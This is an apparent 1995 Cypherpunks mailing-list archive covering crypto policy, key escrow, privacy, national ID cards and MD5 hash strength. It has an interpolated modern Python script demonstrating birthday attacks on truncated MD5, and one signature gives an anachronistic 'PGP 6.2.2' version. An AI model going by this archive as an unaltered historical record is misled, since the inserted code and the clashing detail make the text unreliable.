The problem with the theory of transaction blocking is that it requires millions of potential sellers of goods, services, and jobs around the world to turn away customers. Something that most people are unwilling to do. Thus, if some entity tries to control net access by restricting it to "licensed" users --- a real legal problem in the US BTW --- all that you have to do is open an account somewhere else on earth and dial out to it or use a connection via an X25 network. All the Great Enemy can do is make you spend a little more money. Eventually of course, encrypted untraceable TCP/IP sessions will be possible and domestic ISPs could -- without risk --- offer "encrypted only" pipes out to the nets. "Once you get there it's up to you what you do but we don't/can't know about it." Note that soon, millions of people will have high-speed, cable-based, full-time net access. These people will be one mouse click away from being a full-service ISP. Stick the ISP in a Box BSD CD-ROM in the drive and double-click on setup.exe. If the CD-ROM is produced by the right parties, it will automatically support encrypted TCP/IP. These millions of ISPs can offer net-access accounts right away and add dial up later for the neighbors if they feel like it. It is the vast number of vendors and the cheapness of the connection that makes it so hard to control net access. The computer and telecoms revolution has the same effect on banking and other services to which the authorities hope to block access. Thus cheap telecoms, computing power, and well-developed electronic funds transfer systems are easily turned into free banking. We all know that every node/user on the net is a potential gateway to another network (potentially of great size) on the "other side" of his connection. In the same way, every user of "cheap, easy, and open" electronic funds transfer system is a potential bank, a potential money "switch". 
The famous Fort Lee Switch located in Fort Lee, New Jersey at the West end of the George Washington Bridge is an important switch for the financial funds transfer networks going into and out of NYC. Think of it as the IBM 360 running a proprietary operating system on a somewhat closed loop. The future open funds transfer systems will be like the personal computers that can far exceed the performance of the old monopoly mainframes. Since everyone will be able to switch funds (and every *one* includes every fictitious entity, software agent, corporation, trust, organization, or firm anyone can create on earth) they will be able to switch funds for anyone else. Controlling a system with an almost unlimited number of switch points will not prove possible. Individuals and the entities they control can be counted on to protect themselves from the financial losses occasioned by fraud or theft. They can be their own auditors. But they can't be counted on to forego profit so that the governments of the world can try and prevent some people from engaging in mutually beneficial private transactions. An attempted cartel of that sort --- one that tries to enlist the billion or so people who will be easily and reliably switching funds within a few years --- is doomed to failure. Too many potential 'cheaters.' Too much money to be made by breaking with the cartel and offering financial services to others who wish to use them. And where money leads, other forms of human interaction will follow. Once money is free it can buy, bribe, or finagle its way past the other attempted restrictions on voluntary transactions. DCF "If you can figure out a way to keep 1 billion people who have cheap, powerful, uncensored, computers and telecommunications from being free; you're a better man than I am Gunga Din." From mark at unicorn.com Fri Sep 8 10:23:40 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Fri, 8 Sep 95 10:23:40 PDT Subject: Scientology tries to break PGP - and fails?
Message-ID: On Fri, 8 Sep 1995, Tom Rollins wrote: > I took a look at the FACTNet web page. There is a file encrypted with > PGP using the "-c" option. They are asking for people to help guess > the Pass Phrase. Why would anyone bother if they had no clue that the > file contained anything 'interesting'. I can only assume one of two things - either this is a joke, as the decrypted contents are nothing special as far as I can see (though 'interesting' in a sense), or that someone is very, very clever and managed to hide two different messages in there with different passphrases. > If this is the file that the Co$ is trying to crack, then what the > is being asked for is a pass phrase that can be handed to the Co$ that > will pass the PGP valid key check and still not decrypt the data to > anything useful. If this is the file the Co$ want to crack, they're a) clearly cryptographically inept, and b) the joke's clearly on them 8-).. Any hacker worthy of the name ought to get the passphrase within three attempts (I got it first time). Note for paranoids: Of course, this message may just be a ruse to put the Co$ off the scent ;-).. Mark From trei at process.com Fri Sep 8 10:32:50 1995 From: trei at process.com (Peter Trei) Date: Fri, 8 Sep 95 10:32:50 PDT Subject: (Fwd) CFP: Workshop on Information Hiding Message-ID: <9509081732.AA26869@toad.com> This was on the www-security list. ------- Forwarded Message Follows ------- Date: Mon, 28 Aug 95 12:11:06 EDT From: allegra!slow at uunet.uu.net (Steven H. Low) There's a www version on http://www.cl.cam.ac.uk/users/rja14/ihws.html ================================================================= Workshop on Information Hiding First Call for Papers 30 May - 1 June 1996 Isaac Newton Institute, University of Cambridge, UK Many researchers are interested in hiding information or in stopping other people doing this.
Until now, their efforts have been fragmented, with different groups interested in copyright marking of digital objects, covert channels in computer systems, subliminal channels in cryptographic protocols, broadcast encryption schemes, low-probability-of-intercept communications such as spread spectrum and meteor scatter, and various kinds of anonymity services ranging from steganography through location security to digital elections. However these areas of study are closely linked, and we wish to create an opportunity for a fruitful exchange of ideas. We are therefore organising a workshop on information hiding, which will form part of a six month research programme being held at the Isaac Newton Institute on Computer Security, Cryptography and Coding Theory. Given a positive response from the research community, it is hoped that this will become a regular event. Instructions for authors: Interested parties are invited to submit papers on research and practice which are related to these areas of interest. Submissions can be made electronically (latex or postscript; preferred format is latex using llncs.sty) or in paper form; in the latter case, send eight copies suitable for blind refereeing (the authors' names should be on a separate cover sheet and there should be no obvious references). Papers should not exceed fifteen pages in length. 
Addresses for submission: ross.anderson at cl.cam.ac.uk Ross Anderson, Cambridge University Computer Laboratory, Pembroke Street, Cambridge CB2 3QG, England Deadlines: Paper submission: 31st December 1995 Notification of acceptance: 29th February 1996 Camera-ready copy due: 31st March 1996 Program committee: Ross Anderson (Cambridge University) Steve Low (AT&T Bell Laboratories) Ira Moskowitz (US Naval Research Laboratory) Andreas Pfitzmann (Technical University of Dresden) Gus Simmons (University of New Mexico) Michael Waidner (IBM, Zuerich) Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From andrew_loewenstern at il.us.swissbank.com Fri Sep 8 10:35:59 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Sep 95 10:35:59 PDT Subject: Hacking banking (fwd) Message-ID: <9509081735.AA03442@ch1d157nwk> David Weisner writes, in a message forwarded by Brad Dolan: > "Already, Fuentes said, federal authorities in New York are > investigating whether programmers hired to write software for a > financial institution may have left a 'back door' open in the > program, one through which money may have been diverted to foreign > bank accounts." > Does anyone know what this federal investigation in New York is > about? How about copying this note around and seeing what people > can find out? Perhaps this is related to the recent Citicorp (Citibank? I have trouble keeping up...) job done by the people in Russia? andrew From trollins at hns.com Fri Sep 8 10:40:11 1995 From: trollins at hns.com (Tom Rollins) Date: Fri, 8 Sep 95 10:40:11 PDT Subject: Scientology tries to break PGP - and fails? In-Reply-To: Message-ID: <9509081739.AA20098@dcn92.hns.com> > > On Fri, 8 Sep 1995, Tom Rollins wrote: > > > I took a look at the FACTNet web page. There is a file encrypted with > > PGP using the "-c" option. They are asking for people to help guess > > the Pass Phrase. 
Why would anyone bother if they had no clue that the > > file contained anything 'interesting'. > > I can only assume one of two things - either this is a joke, as the > decrypted contents are nothing special as far as I can see (though > 'interesting' in a sense), or that someone is very, very clever and > managed to hide two different messages in there with different > passphrases. > > > If this is the file that the Co$ is trying to crack, then what the > > is being asked for is a pass phrase that can be handed to the Co$ that > > will pass the PGP valid key check and still not decrypt the data to > > anything useful. > > If this is the file the Co$ want to crack, they're a) clearly > cryptographically inept, and b) the joke's clearly on them 8-).. Any > hacker worthy of the name ought to get the passphrase within three > attempts (I got it first time). > > Note for paranoids: Of course, this message may just be a ruse to put > the Co$ off the scent ;-).. > > Mark Ooops, I see what you mean. It is funny ! I simply did not take this at face value. -tom From andrew_loewenstern at il.us.swissbank.com Fri Sep 8 10:43:41 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Sep 95 10:43:41 PDT Subject: 64-bit GAK && 128-bit hashes Message-ID: <9509081743.AA03448@ch1d157nwk> The recent guidelines for proposed export regulations from NIST include 64-bit keys and several people here have commented that this implies NSA ability to brute-force 64-bit keys now or in the near future ("belt and suspenders"). How does this bode for 128-bit hash functions such as MD5? If 64-bit encryption algorithms can be brute-forced, could birthday attacks and the like on 128-bit hashes be feasible as well? Perhaps the crypto community should start seriously considering moving away from MD5 and towards 160-bit hashes such as SHA or even 256-bits...
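The arithmetic behind Andrew's question above, as an added example that is not part of his message or of any code on this list: a generic birthday attack finds a collision in an n-bit hash after roughly sqrt(pi/2 * 2^n) evaluations, so collision resistance of a 128-bit digest is on the order of 2^64 work, the same order as brute-forcing a 64-bit key, while a preimage (the "work it backwards through the MD5" problem) still costs about 2^n. The script below truncates MD5 to a small number of bits so both searches finish in seconds and the trial counts can be compared with the bounds; the truncation widths, the `seed` label and the `b"target"` string are the example's own choices. This is the generic bound for any hash; structural weaknesses in a particular function can only lower it.

```python
"""Birthday bound vs. preimage cost, demonstrated on a truncated MD5.

Added example; not from the original mailing-list post. Truncating the
digest to `bits` bits models an "n-bit hash" small enough to attack here.
"""
import hashlib
import math
from typing import Dict, Tuple


def truncated_md5(data: bytes, bits: int) -> int:
    """Return the leading `bits` bits of MD5(data) as an integer."""
    digest = hashlib.md5(data).digest()
    return int.from_bytes(digest, "big") >> (128 - bits)


def find_collision(bits: int, seed: bytes = b"cypherpunks") -> Tuple[bytes, bytes, int]:
    """Birthday attack: hash distinct inputs until two share a truncated digest.

    Inputs are seed || 8-byte counter, so the search is deterministic.
    Returns (m1, m2, trials), where trials is the number of hashes computed.
    Expected trials ~ sqrt(pi/2 * 2**bits); memory grows with trials.
    """
    seen: Dict[int, bytes] = {}
    counter = 0
    while True:
        msg = seed + counter.to_bytes(8, "big")
        h = truncated_md5(msg, bits)
        if h in seen:
            return seen[h], msg, counter + 1
        seen[h] = msg
        counter += 1


def find_preimage(bits: int, target: int, seed: bytes = b"cypherpunks") -> Tuple[bytes, int]:
    """Brute-force preimage: find an input whose truncated digest equals `target`.

    No table helps here; expected trials ~ 2**bits. The "/" separator keeps the
    candidate space distinct from the collision search's inputs.
    """
    counter = 0
    while True:
        msg = seed + b"/" + counter.to_bytes(8, "big")
        if truncated_md5(msg, bits) == target:
            return msg, counter + 1
        counter += 1


def expected_collision_trials(bits: int) -> float:
    """Expected number of random digests drawn before the first repeat."""
    return math.sqrt(math.pi / 2 * (1 << bits))


def expected_preimage_trials(bits: int) -> float:
    """Expected number of candidates tried before hitting a fixed digest."""
    return float(1 << bits)


if __name__ == "__main__":
    # Collisions: 32 bits of digest fall in ~2**16 trials, not 2**32.
    m1, m2, n = find_collision(32)
    print(f"32-bit collision after {n} trials "
          f"(birthday bound ~{expected_collision_trials(32):.0f}, brute force 2**32)")
    print(f"  {m1.hex()} and {m2.hex()} -> {truncated_md5(m1, 32):08x}")

    # Preimages: even 20 bits takes ~2**20 trials; the table trick does not apply.
    tgt = truncated_md5(b"target", 20)
    p, k = find_preimage(20, tgt)
    print(f"20-bit preimage after {k} trials "
          f"(expected ~{expected_preimage_trials(20):.0f})")
    print(f"  {p.hex()} -> {truncated_md5(p, 20):05x}")
```

Scaling the two curves to a full 128-bit digest gives the asymmetry Andrew is pointing at: 2^64 hash evaluations for a collision (comparable to a 64-bit key search, and the attacker gets to pick both colliding documents, which is what matters for signature forgery) against 2^128 for a preimage. Moving to a 160-bit hash pushes the generic collision cost to 2^80.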
andrew From sinclai at ecf.toronto.edu Fri Sep 8 11:16:47 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Fri, 8 Sep 95 11:16:47 PDT Subject: Privacy book list Message-ID: <95Sep8.141612edt.4207@cannon.ecf.toronto.edu> I got a letter in the mail today from Plenum Publishing Corp in NY, advertising a book called _Mind Your Own Business: The Battle for Personal Privacy_ by Gini Graham Scott. It seems I am on a mailing list for privacy freaks. Oh the irony! They must have gotten my name from somewhere. The only two sources that I can think of are the lists for CFP '94 and '95, and a revolver club that I used to be a member of. Has anyone else on the list gotten this ad? From tedwards at src.umd.edu Fri Sep 8 11:25:35 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 8 Sep 95 11:25:35 PDT Subject: Commercial Speech over Internet product In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Matthew Ghio wrote: > The program is a sound-listening extension for web-browsers. There is > really no use for crypto because it's only processing information which > is already public. I can easily imagine pay recorded sex lines or pay stock market analysis via this service, either of which you might want to have encrypted. -Thomas From tedwards at src.umd.edu Fri Sep 8 11:42:54 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 8 Sep 95 11:42:54 PDT Subject: Correction about who opposes crypto regulations.... In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Timothy C. May wrote: > On the contrary, the Libertarian Party has come out strongly in favor of > cryptography and privacy, and they are consistently either #3 or #4 in > popularity. The US Libertarian Party Platform supports crypto, and the LP has issued press releases critical of the FBI Telecom (wiretapping) Bill and Clipper. The LP was also part of the coalition against internet censorship this year.
The LP is the third largest political party in the US, and party members hold over 150 elected and appointed public offices in the U.S. They will again have a presidential candidate on the ballot in all 50 states next year as they did in the last election, and a potential LP presidential candidate (Harry Browne, http://www.rahul.net/browne) will be in the CityVote debates which will be nationally televised next month. The LP was also the first party to have a female candidate who won an Electoral College vote. For more details on the LP, you should go to http://www.lp.org/lp -Thomas Edwards From tedwards at src.umd.edu Fri Sep 8 11:45:51 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 8 Sep 95 11:45:51 PDT Subject: ON OFF-TOPIC In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Yih-Chun Hu wrote: > Whatever. Clinton proposed crypto, some democrat wrote the electronic > decency act. (In fact Gingrich was against it) Nevertheless, Gingrich did not flinch when internet censorship amendments to the telecom bill went right by him in the House. -Thomas From sunder at escape.com Fri Sep 8 11:57:31 1995 From: sunder at escape.com (Ray Arachelian) Date: Fri, 8 Sep 95 11:57:31 PDT Subject: cryptography eliminates lawyers? In-Reply-To: <199509061709.MAA00612@bioanalytical.com> Message-ID: We wish! We really wish! ========================================================================== + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | _ |> \|/ |sunder at escape.com| Where day by day, yet another | \ | <--+-->| | Constitutional right vanishes.
| \| /|\ | Just Say | | <|\ + v + | "No" to the NSA!| Jail the censor, not the author!| <| n ========================================================================== From mfroomki at umiami.ir.miami.edu Fri Sep 8 11:57:33 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Fri, 8 Sep 95 11:57:33 PDT Subject: Looking for IETF old-timers (and others) Message-ID: I've put up on a web page some parts of a paper I am writing on Internet jurisprudence. I'd welcome comments from anyone (this is a very early draft), but especially from any IETF old-timers, as the paper has a lot about the early days of internet standardmaking. The URL is http://www.law.miami.edu/~mfroomki/ils/ils.htm A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (soon to move to its real home): http://www.law.miami.edu/~mfroomki From tedwards at src.umd.edu Fri Sep 8 12:20:21 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 8 Sep 95 12:20:21 PDT Subject: Cato Study Release: National ID Card Ineffective and Intrusive Message-ID: CATO STUDY RELEASE September 7, 1995 National ID card ineffective and intrusive, study says Congressional Republican proposals to create a national computerized registry and an ID card for all American workers would establish "a dangerous, invasive, and unworkable new expansion of federal police-state powers," according to a new Cato Institute study. In "A National ID System: Big Brother's Solution to Illegal Immigration" (Policy Analysis no. 237), John J. Miller and Stephen Moore say Sen. Alan Simpson (R-Wyo.) and Rep. Lamar Smith (R-Tex.) are taking the "critical first step" toward implementing a potentially invasive national worker authorization system. 
Moore is director of fiscal policy studies at the Cato Institute, and Miller is vice president of the Center for Equal Opportunity. An Orwellian system The authors say that Smith and Simpson want to require an ID card and computerized worker registry for the 150 million Americans and legal immigrants in the U.S. labor force. Sen. Dianne Feinstein (D-Calif.) wants that national ID card to include such information as a photograph, fingerprint, and retina scan. The study says such a system would, in effect, "require employers to submit all of their hiring decisions for approval to a federal bureaucrat." The authors call the proposed registry and national ID card "Big Brother's solution to illegal immigration." They say the national ID card would constitute a massive invasion of privacy and violation of basic civil liberties; cost the government $3 billion to $6 billion to implement; subject workers to the effects of potentially huge error rates, with perhaps millions of legal aliens denied jobs because of faulty government databases (even a 2 percent error rate would lead to 1.3 million Americans being wrongfully denied jobs); increase discrimination against Latin and Asian Americans; and, ultimately, fail to affect illegal immigration. Moore and Miller say that, once established, the computer registry could be easily expanded and applied to other areas, vastly increasing the size and scope of government. Some of the potential uses of the system include implementing a Clinton-style health care plan and security card; ensuring employer compliance with affirmative action requirements; tracking child support payments; verifying that parents are getting their children vaccinated; and conducting background checks on would-be gun purchasers, among others. 
Better approaches available After spending a year defeating the Clinton administration's health security card, Moore and Miller say, the new GOP Congress now wants every American to carry a "work authorization card" that would create similar potential for intrusion and abuse. The authors claim there are ways to address the problem of illegal immigration that would expand, rather than curtail, Americans' basic freedoms. We could, for example, expand legal immigration quotas, eliminate employer sanctions law, establish greater economic integration between the United States and Mexico, restrict welfare eligibility of legal and illegal immigrants, facilitate the deportation of criminal aliens, tighten visa control, and improve border enforcement. Why it matters It is an iron rule of politics that whenever there is a perceived "crisis" in Washington, Congress responds by passing bad laws that expand the powers of government. Moore and Miller say the immigration issue is fertile ground for such laws. The implications of a national ID system would range far beyond today's debate over illegal immigration. The study says the proposed worker registry system has no redeeming feature. It will not curtail illegal immigration, and it will create opportunities for abuse. At a time when Americans are loudly demanding more freedom and smaller government, Moore and Miller say a computer registry is a giant step in the wrong direction. From hfarkas at ims.advantis.com Fri Sep 8 12:38:19 1995 From: hfarkas at ims.advantis.com (Henry W. Farkas) Date: Fri, 8 Sep 95 12:38:19 PDT Subject: Scientology tries to break PGP - and fails? In-Reply-To: <9509081620.AA19816@dcn92.hns.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 8 Sep 1995, Tom Rollins wrote: > If Larry Wollersheim does have the valid key. It would be a simpler > process to know what fake key to use and work it backwards through > the MD5 to arrive at an ascii string to produce the fake key.
> > Too bad this wouldn't be plausible for the secret ring. Perhaps PGP > needs an option to specify the key in Hex and make the process easy. Here's another option. I just have no idea if it is possible, nor how it would be implemented! PGP could allow for an alternate secret key and a boilerplate document. This document would be "overlaid" or appended to the target file at encryption. When the safety is finally removed from the gun at your head (sorry for the drama) you hand over your alternate secret key. The encrypted file is wiped until it reaches a marker; the remainder of the file is displayed. If you are forced to turn over keys some day (and I think there is at least a reasonable likelihood of that) then They will have a much harder time arguing "But that's not what the file *really* said and, deep inside of me, I know it!". At that point, with a secure wipe going on while the "decryption" was taking place, you have done the best you could. I agree- a search warrant gives authorities the right to search your home (or disk)- not a guarantee that they'll find what they're looking for. =========================================================================== Henry W. Farkas | Me? Speak for IBM? Fat chance. hfarkas at ims.advantis.com |------------------------------------------------ hfarkas at vnet.ibm.com | http://newstand.ims.advantis.com/henry henry at nhcc.com | http://www.nhcc.com/~henry - --------------------------------------------------------------------------- PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53 Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers. - --------------------------------------------------------------------------- Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not fast, but it's not bad, and we're cheaper than the guy down the street!"
=========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta iQCVAwUBMFCbU6DthkLkvrK9AQExWwQAoXSQ+6rL2tLf61F1Zj7fX6gO4ZZOaASZ O5v0aDN1LXttmv+YUslMU8B1mpKexVk5FZDBMJ2MkonDssi5kcNNhUKc911x7zyh oLh1I8lA4RPKdrxY7AuRF+GQpOmHFpb6FK18Aq+EkiJX5mmKpCANY8tYqcpiZ4o7 GHt0DVuKhaE= =uQD0 -----END PGP SIGNATURE----- From tbyfield at panix.com Fri Sep 8 12:45:46 1995 From: tbyfield at panix.com (Ted Byfield) Date: Fri, 8 Sep 95 12:45:46 PDT Subject: Car rentals, Driver's Licenses, Ecash, & Net Access Message-ID: At 1:21 PM 9/8/95, Duncan Frissell wrote a very interesting disquisition: >An attempted cartel of that sort --- one that tries to enlist the billion or >so people who will be easily and reliably switching funds within a few years >--- is doomed to failure. Too many potential 'cheaters.' Too much money to >be made by breaking with the cartel and offering financial services to >others who wish to use them. One question: Most of your remarks (and you're in no way alone in this regard) seem to assume that uniformity is a sine qua non of law enforcement (as opposed, say, to selective enforcement). Correct me if I'm wrong. I wonder, though, whether this is so; isn't it true that the impossibility of consistent enforcement may well encourage a systemically selective enforcement (maybe shaped by this or that, one's politics, for example)? Presumably, then, law enforcement would take on an increasingly "terroristic" character--"random," as IRS audits and the like can be. Some recent high-profile cases (Packwood, and Kenneth Starr's efforts to indict Gov.
Tucker) might indicate the shape that enforcement could take, especially in light of some recent congressional legislative efforts: the gov't investigates you regarding X, in the process of the investigation turns up Y and Z, and thus finds reason maybe to look into A, B, and C as well--in effect, turning your life into a nightmare. But I digress: The main point, really, is that enforcement doesn't need to be nonselective to be "effective." I think this holds whether I understood your remarks correctly or not. Ted From stewarts at ix.netcom.com Fri Sep 8 13:06:19 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 13:06:19 PDT Subject: [NOISE] Re: Notes from NIS&T Key Escrow Export conference. Message-ID: <199509082006.NAA24844@ix8.ix.netcom.com> At 09:04 PM 9/7/95 -0500, you wrote: >> Sorry for the typo, yes, I meant sham, fake, theater, all smoke and >> mirrors, nothing sincere, etc. See reference to "stage" above. >> >In this context, I think burlesque fits remarkably well. ;) >(Brings to mind a bunch of cross-dressers doing big theatre numbers >in exotic costumes) "I never wanted to be an eavesdropper - I wanted to be a ... lumberjack!" #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 8 13:07:37 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 13:07:37 PDT Subject: cryptography eliminates lawyers? Message-ID: <199509082006.NAA24910@ix8.ix.netcom.com> >> > Telecoms will certainly break the professional >> > monopoly of lawyers (and other professionals). >> This I don't. How do you mean exactly? >Licensing requires the ability to outlaw unlicensed transactions.
>Since the Net trumps censorship and allows consultations at a >distance, it cracks licensing, It does reduce the ability of geographical organizations to restrict who does business there, so markets will probably force some shakeups in jurisdictions. But lawyer work seems to mostly involve either contracts or courts - as long as courts are still run by governments, they can restrict who gets to practice in them, and who's allowed to write paper that they'll judge disputes about. Crypto _could_ be used for a modern version of the Stamp Tax - documents might need to be digitally signed by Certified Lawyers (though of course that may be lawyers putting their stamps on work mostly done by clerks.) Crypto may make it easier to resolve some kinds of disputes, by identifying who did what when, but the net isn't going to make the number of disputes decrease.... #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 8 13:08:20 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 13:08:20 PDT Subject: ON OFF-TOPIC [NOISE] Message-ID: <199509082006.NAA24898@ix8.ix.netcom.com> At 10:16 PM 9/7/95 -0400, Phill wrote: >>Nope. but the patriots & the cyPHerpunks share a common goal, and belief >>that it is none of the government's business what we think or want to >>share with our computers. >Poor you, the only major political party to come out with a pro crypto statement >is a socialist party. But - wait! Of course you're not a patriot - You're a foreigner! Oh, no! :-) >The problem is currently with the right wing, right wing democrats such as >Clinton and practically all the Republicans. 
As you later point out, it's really an authoritarian/libertarian issue, (though it's at least nice to hear somebody else who realizes Clinton's no liberal :-); it affects both economic control/freedom issues and freedom of speech issues as well. A lot of the Republicans, mainly the newly elected ones, are less anti-crypto, partly because they're pro-business, and sometimes pro-free-speech, but also because they're not as closely tied in to the authoritarian power structure the way Bush and Clinton have been. >If you want a debate on how to convince the authoritarians then perhaps you will >get some interest. That'll be tough. The military and police can already get good crypto, as can other gov't agencies that want to use it to increase their power. Crypto can also be really effective for National ID cards, but I'd really rather not encourage them to think along those lines at all, even using Chaum techniques. You can use it to hide campaign contributions and bribes, but of course they probably don't want to admit that in public. If everyone in the government were to use key-escrowed phones, folks like Ollie North would probably realize they had to be careful with their communications, but it would at least let gentlemen read each others' mail... Is there something authoritarians want, that we don't mind them having, for which crypto would be an enabling technology? Some of them _might_ be interested in having better encryption for TV channels so that kids can't watch a NotForKids channel (though many of them might rather ban it outright) or so they can easily control whether their kids get to watch MTV even though the V-Chip doesn't have a NoisyKidsMusic bit. Perhaps they'd enjoy having reputation systems available, so they can easily filter out politically incorrect material, or do a thumbs-down on things they disapprove of, or let the Baptists and Catholics and Anti-Baptists all have their own convenient ratings. 
#--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From eb at comsec.com Fri Sep 8 14:04:51 1995 From: eb at comsec.com (Eric Blossom) Date: Fri, 8 Sep 95 14:04:51 PDT Subject: Cypherpunks Lite archives now available Message-ID: <199509082050.NAA22694@comsec.com> I've made available archives of the last 8 months of Cypherpunks Lite for your perusal. ftp://ftp.crl.com/users/co/comsec/cp-lite One year subscriptions are available for $20. To subscribe, send check or money order to: COMSEC Partners 1275 Fourth St., Suite 194 Santa Rosa, CA 95404. Be sure to indicate your email address and whether you want message-by-message delivery or a daily digest. Eric From keelings at wu1.wl.aecl.ca Fri Sep 8 14:35:20 1995 From: keelings at wu1.wl.aecl.ca (S. Keeling) Date: Fri, 8 Sep 95 14:35:20 PDT Subject: ECPA (Was: University logging mail to anon.penet.fi) Message-ID: <9509082134.AA19037@wu1.wl.aecl.ca> Incoming from Jim Ray: > "Josh M. Osborne" writes: > > >down somewhat, in a very libertarian society you might be able to > >run a profitable ISP selling to the very niche market of people who > >want to threaten, harass, or generally make a nuisance of themselves). > > As the list's designated "very libertarian" advocate, I must object. > Here is what you must sign to become a member of the Libertarian Party: And here, I must object (sorry Perry; I'll be brief). Whatever do the workings of a hypothetical "libertarian" society have to do with the "Libertarian Party"? Certainly, it would be nice if the latter were working towards the former, but the two are not the same. I know of quite a few `l'ibertarians who strongly object to the `L'ibertarian Party pledge. -- "Remember, obsolescence (Win95) isn't an accident; it's an art form!" keelings at wu1.wl.aecl.ca s.
keeling, aecl - whiteshell labs From jya at pipeline.com Fri Sep 8 14:35:52 1995 From: jya at pipeline.com (John Young) Date: Fri, 8 Sep 95 14:35:52 PDT Subject: 9K P6 Message-ID: <199509082135.RAA26681@pipe2.nyc.pipeline.com> There's a bit more on Intel's supercomp virtual NW tester at: URL: http://www.ssd.intel.com/press/asci1.html Here's a sample: ---------- Intel Scalable Systems Division Fortunately, advances in computer hardware and software technologies are making computer-based virtual weapons testing and prototyping a viable and affordable alternative to the traditional nuclear and non-nuclear testing of stockpile stewardship. The Intel teraflop computer announced today is a key milestone in the shift from nuclear testing to computer-simulated testing. The ASCI Program Located within the DOE's Defense Programs (DP) laboratories, the U.S. Department of Energy's Accelerated Strategic Computing Initiative (ASCI) is a multi-year program to extend DOE's computational resources to support virtual testing and prototyping capabilities for nuclear weapons. ... ASCI has four objectives, each of which requires computational capabilities that are beyond the capabilities of existing systems: * Performance -- Create credible virtual tests to analyze the performance and predict the behavior of nuclear weapons. * Safety -- Predict the behavior of full weapons systems in complex accident scenarios. * Reliability -- Develop the ability to make predictions that will extend the lifetime of current weapons, predict failure mechanisms and reduce routine maintenance requirements. * Renewal -- Use virtual prototyping to reduce production and testing facilities for stockpile requalification and replacement work. ... Beyond its weapons safety impact, the teraflop computer will have a wide range of other applications -- from developing safer, more efficient cars to simulating natural disasters in real-time to finding new drugs to fight disease. 
The machine will be one of the world's foremost scientific research tools and will act as a magnet for advanced research projects.

In 1963, John Kennedy referred to a test ban treaty as a shaft of light cut into the darkness of the Cold War -- a chance to step back from the shadows of war. Today, by making it possible to ensure the safety, reliability, and performance of the weapons stockpile while forgoing nuclear testing, the Intel/Sandia teraflop computer can help the world take a further step back from the shadows of war into the light of peace.

From cme at TIS.COM Fri Sep 8 14:44:11 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 8 Sep 95 14:44:11 PDT
Subject: GAK
In-Reply-To: <199509082005.NAA22461@comsec.com>
Message-ID: <9509082139.AA09726@tis.com>

>Date: Thu, 7 Sep 1995 13:09:03 -0800
>From: cman at communities.com (Douglas Barnes)
>
>One good (non-cypherpunk) argument against GAK is that it
>concentrates a very large quantity of valuable keys in a few
>places, where they become an extremely attractive target for
>government or corporate espionage.

[...]

>Note that a few million keys would fit very easily on even a
>low-end DAT tape (easily hidden in a pack of cigarettes).

The same danger happens with the TIS DRC (see the company web page), even though there is no key escrow in the TIS system. Instead, the emergency access field (Data Recovery Field (DRF)) is stored with the file -- but the key which encrypts it is the public key of the Data Recovery Center (DRC).

If too much attractive stuff is available by loss of any one public key, that key gets attacked. To compensate for this, the TIS DRC generates new public keys periodically to give out to new (or old) customers.

However, a government warrant which demands the DRC's private key collection would gain quite a harvest.

+--------------------------------------------------------------------------+
|Carl M. Ellison          cme at tis.com   http://www.clark.net/pub/cme/home.html|
|Trusted Information Systems, Inc.       http://www.tis.com/                |
|3060 Washington Road     PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2       |
|Glenwood MD 21738        Tel:(301)854-6889  FAX:(301)854-5363              |
+--------------------------------------------------------------------------+

From KLAURICH at uofrlaw.urich.edu Fri Sep 8 15:00:50 1995
From: KLAURICH at uofrlaw.urich.edu (Richard P. Klau)
Date: Fri, 8 Sep 95 15:00:50 PDT
Subject: Privacy book list
Message-ID: <2A82FB42074@UOFRLAW.URICH.EDU>

> I got a letter in the mail today from Plenum Publishing Corp in NY,
> advertising a book called _Mind Your Own Business: The Battle for
> Personal Privacy_ by Gini Graham Scott. It seems I am on a
> mailing list for privacy freaks. Oh the irony!
>
> They must have gotten my name from somewhere. The only two sources that
> I can think of are the lists for CFP '94 and '95, and a
> revolver club that I used to be a member of. Has anyone else on the
> list gotten this ad?

